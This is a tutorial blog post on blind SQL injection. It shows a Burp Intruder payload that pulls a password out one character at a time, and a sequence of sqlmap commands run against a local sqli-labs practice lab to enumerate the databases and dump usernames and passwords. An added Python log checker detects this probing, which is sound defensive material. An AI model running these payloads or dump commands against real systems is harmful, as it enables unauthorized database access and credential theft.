Running blind SQL injection with tools
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Running blind injection with Burp
1.2 Method 2: Brute-forcing with an injected statement
2. (Tool) Running Boolean blind injection with sqlmap
Step 1: Detect whether injection exists
Step 2: Enumerate database names
Step 3: Enumerate table names
1. (Tool) Running blind injection with Burp
1.1 Method 1: Brute force
After capturing the request, send it to the "Intruder" module.
Set up 2 payloads.
1.2 Method 2: Brute-forcing with an injected statement
Construct the injection statement and iterate over the two payload positions:
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
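Seen from the server side, the iteration in Method 2 leaves a recognizable trail: one client requesting the same path with a one-character substring(...) slice at a steadily changing offset. The following log check is an added example, not part of the original post; the log format, IP addresses, paths and the min_positions threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Statement from section 1.2 with the two Intruder markers turned into fields.
STMT = ("(select case when '{c}' = lower(substring((select password from "
        "employees where empid=1),{p},1)) then 1 else 0 end)")

def _line(ip, path, value):
    # Build one constructed Common Log Format line (sample data, not a capture).
    return (f'{ip} - - [03/Jul/2022:04:38:00 +0000] '
            f'"GET {path}?id={quote(value)} HTTP/1.1" 200 512')

SAMPLE_LOG = (
    [_line("203.0.113.7", "/item", STMT.format(c=c, p=p))
     for p in (1, 2, 3) for c in "abc"]
    # Benign traffic: a normal id, and a single lookup that mentions substring().
    + [_line("198.51.100.4", "/item", "42"),
       _line("198.51.100.4", "/docs", "substring(name,1,1)")]
)

REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*"')
# One-character slice at a numeric offset: substring(<expr>, N, 1)
SLICE = re.compile(r"\b(?:substring|substr|mid)\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)",
                   re.I | re.S)

def find_blind_extraction(lines, min_positions=3):
    """Return {(client, path): sorted offsets} for clients that slice one
    character at min_positions or more different offsets on the same path."""
    seen = defaultdict(set)
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, target = m.groups()
        path, _, query = target.partition("?")
        hit = SLICE.search(unquote_plus(query))  # decode %XX before matching
        if hit:
            seen[(client, path)].add(int(hit.group(1)))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_positions}

if __name__ == "__main__":
    for (client, path), offsets in find_blind_extraction(SAMPLE_LOG).items():
        print(f"{client} {path}: one-character probes at offsets {offsets}")
```

A single request containing substring(...,1,1) is not flagged; only the spread of offsets from one client on one path is, which is what keeps the benign /docs lookup out of the result.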
2. (Tool) Running Boolean blind injection with sqlmap
2.1 Commands:
-u specify the injection point (target URL)
--dbs enumerate database names
--tables enumerate table names
--columns enumerate column names
--dump dump the data
Once each level has been enumerated, add in turn -D to specify the database, -T to specify the table, and -C to specify the columns.
2.2 Usage process:
Step 1: Detect whether injection exists
Basic usage:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch uses the default answers instead of prompting.
In fact, the environment has already been identified by the scan,
so you can now add --dbms mysql.
Step 2: Enumerate database names
Commands:
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Basic usage:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: Enumerate table names
Command:
python sqlmap.py -u url -D DB --tables --batch
Basic usage:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: Enumerate column names
Command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic usage:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: Dump the data
Command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic usage:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3. Recommended reading
[SQL injection - no echo] Boolean blind injection: principle, functions, usage process
[SQL injection - with echo] DNS request injection: principle, platform, usage process, configuration